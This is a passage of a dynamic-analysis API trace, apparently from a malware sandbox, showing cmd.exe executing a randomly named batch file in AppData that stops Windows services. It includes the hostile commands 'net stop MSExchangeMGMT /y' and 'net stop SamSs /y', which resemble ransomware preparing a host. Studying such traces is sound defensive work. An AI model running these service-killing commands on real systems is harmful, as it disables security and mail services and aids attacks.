(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0208.651] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0208.651] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.651] SetFilePointer (in: hFile=0x74, lDistanceToMove=4493, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x118d [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0208.651] GetProcessHeap () returned 0x3e0000 [0208.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0208.652] GetProcessHeap () returned 0x3e0000 [0208.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0208.652] GetProcessHeap () returned 0x3e0000 [0208.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0208.652] GetProcessHeap () returned 0x3e0000 [0208.652] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0208.652] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.652] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x118d [0208.652] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x734, lpOverlapped=0x0) returned 1 [0208.652] SetFilePointer (in: hFile=0x74, lDistanceToMove=4521, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11a9 [0208.652] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSExchangeMGMT /y\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 28 [0208.652] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.653] GetFileType (hFile=0x74) returned 0x1 [0208.653] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.653] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11a9 [0208.653] GetProcessHeap () returned 0x3e0000 [0208.653] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0208.653] GetProcessHeap () returned 0x3e0000 [0208.653] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0208.656] _tell (_FileHandle=3) returned 4521 [0208.656] _close (_FileHandle=3) returned 0 [0208.656] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0208.656] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0208.656] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0208.656] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0208.656] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0208.656] _wcsicmp (_String1="net", _String2="CD") returned 11 [0208.656] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0208.656] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0208.656] _wcsicmp (_String1="net", _String2="REN") returned -4 [0208.656] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0208.657] _wcsicmp (_String1="net", _String2="SET") returned -5 [0208.657] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0208.657] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0208.657] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0208.657] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0208.657] _wcsicmp (_String1="net", _String2="MD") returned 1 [0208.657] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0208.657] _wcsicmp (_String1="net", _String2="RD") returned -4 [0208.657] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0208.657] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0208.657] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0208.657] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0208.657] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0208.657] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0208.657] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0208.657] _wcsicmp (_String1="net", _String2="VER") returned -8 [0208.657] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0208.657] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0208.657] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0208.657] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0208.657] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0208.657] _wcsicmp (_String1="net", _String2="START") returned -5 [0208.657] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0208.657] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0208.657] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0208.657] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0208.657] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0208.657] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0208.657] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0208.657] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0208.657] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0208.657] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0208.658] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0208.658] SetErrorMode (uMode=0x0) returned 0x1 [0208.658] GetProcessHeap () returned 0x3e0000 [0208.658] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0208.658] GetProcessHeap () returned 0x3e0000 [0208.658] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0208.658] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.658] GetProcessHeap () returned 0x3e0000 [0208.658] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0208.658] GetProcessHeap () returned 0x3e0000 [0208.658] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0208.659] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0208.659] GetProcessHeap () returned 0x3e0000 [0208.659] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0208.659] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.659] GetProcessHeap () returned 0x3e0000 [0208.659] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0208.659] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0208.659] GetProcessHeap () returned 0x3e0000 [0208.659] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0208.660] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.660] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.660] GetLastError () returned 0x2 [0208.660] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.661] GetLastError () returned 0x2 [0208.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.661] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.661] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.662] GetLastError () returned 0x2 [0208.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.662] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.663] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.663] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0208.663] SetErrorMode (uMode=0x0) returned 0x1 [0208.663] GetProcessHeap () returned 0x3e0000 [0208.663] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0208.663] GetProcessHeap () returned 0x3e0000 [0208.663] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0208.664] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.664] GetProcessHeap () returned 0x3e0000 [0208.664] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0208.664] GetProcessHeap () returned 0x3e0000 [0208.664] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0208.664] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0208.664] GetProcessHeap () returned 0x3e0000 [0208.664] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0208.664] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.664] GetProcessHeap () returned 0x3e0000 [0208.664] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0208.665] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0208.665] GetProcessHeap () returned 0x3e0000 [0208.665] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0208.665] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.665] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.666] GetLastError () returned 0x2 [0208.666] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.666] GetLastError () returned 0x2 [0208.666] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0208.667] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0208.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.667] GetLastError () returned 0x2 [0208.668] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0208.668] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0208.668] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.669] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0208.669] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0208.669] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0208.669] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.669] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeMGMT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeMGMT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSExchangeMGMT /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa34, dwThreadId=0x8c0)) returned 1 [0208.673] CloseHandle (hObject=0x74) returned 1 [0208.673] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.673] GetProcessHeap () returned 0x3e0000 [0208.673] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.673] GetEnvironmentStringsW () returned 0x3f8408* [0208.673] GetProcessHeap () returned 0x3e0000 [0208.674] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.674] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.674] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0208.797] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0208.797] CloseHandle (hObject=0x78) returned 1 [0208.797] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0208.797] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0208.797] GetProcessHeap () returned 0x3e0000 [0208.797] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.798] GetEnvironmentStringsW () returned 0x3f8408* [0208.798] GetProcessHeap () returned 0x3e0000 [0208.798] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.798] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.798] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.798] GetProcessHeap () returned 0x3e0000 [0208.798] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.798] GetEnvironmentStringsW () returned 0x3f8408* [0208.798] GetProcessHeap () returned 0x3e0000 [0208.798] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.798] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.798] GetProcessHeap () returned 0x3e0000 [0208.798] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0208.798] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0208.798] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.798] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0208.799] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.799] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0208.799] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.799] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0208.799] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.799] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0208.799] SetConsoleInputExeNameW () returned 0x1 [0208.799] GetConsoleOutputCP () returned 0x1b5 [0208.799] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0208.799] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0208.800] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0208.800] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.800] SetFilePointer (in: hFile=0x78, lDistanceToMove=4521, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11a9 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.800] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0208.800] GetProcessHeap () returned 0x3e0000 [0208.801] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0208.801] GetProcessHeap () returned 0x3e0000 [0208.801] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0208.801] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.801] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11a9 [0208.801] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x718, lpOverlapped=0x0) returned 1 [0208.801] SetFilePointer (in: hFile=0x78, lDistanceToMove=4540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11bc [0208.801] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SamSs /y\r\nMGMT /y\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 19 [0208.801] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.801] GetFileType (hFile=0x78) returned 0x1 [0208.801] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.801] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11bc [0208.801] GetProcessHeap () returned 0x3e0000 [0208.801] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0208.801] GetProcessHeap () returned 0x3e0000 [0208.801] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0208.805] _tell (_FileHandle=3) returned 4540 [0208.805] _close (_FileHandle=3) returned 0 [0208.805] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0208.805] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0208.805] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0208.805] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0208.805] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0208.805] _wcsicmp (_String1="net", _String2="CD") returned 11 [0208.805] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0208.805] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0208.805] _wcsicmp (_String1="net", _String2="REN") returned -4 [0208.805] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0208.805] _wcsicmp (_String1="net", _String2="SET") returned -5 [0208.805] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0208.805] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0208.805] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0208.805] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0208.805] _wcsicmp (_String1="net", _String2="MD") returned 1 [0208.805] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0208.805] _wcsicmp (_String1="net", _String2="RD") returned -4 [0208.805] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0208.805] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0208.805] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0208.805] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0208.805] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0208.805] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0208.805] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0208.805] _wcsicmp (_String1="net", _String2="VER") returned -8 [0208.806] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0208.806] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0208.806] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0208.806] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0208.806] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0208.806] _wcsicmp (_String1="net", _String2="START") returned -5 [0208.806] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0208.806] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0208.806] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0208.806] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0208.806] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0208.806] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0208.806] _wcsicmp (_String1="net", 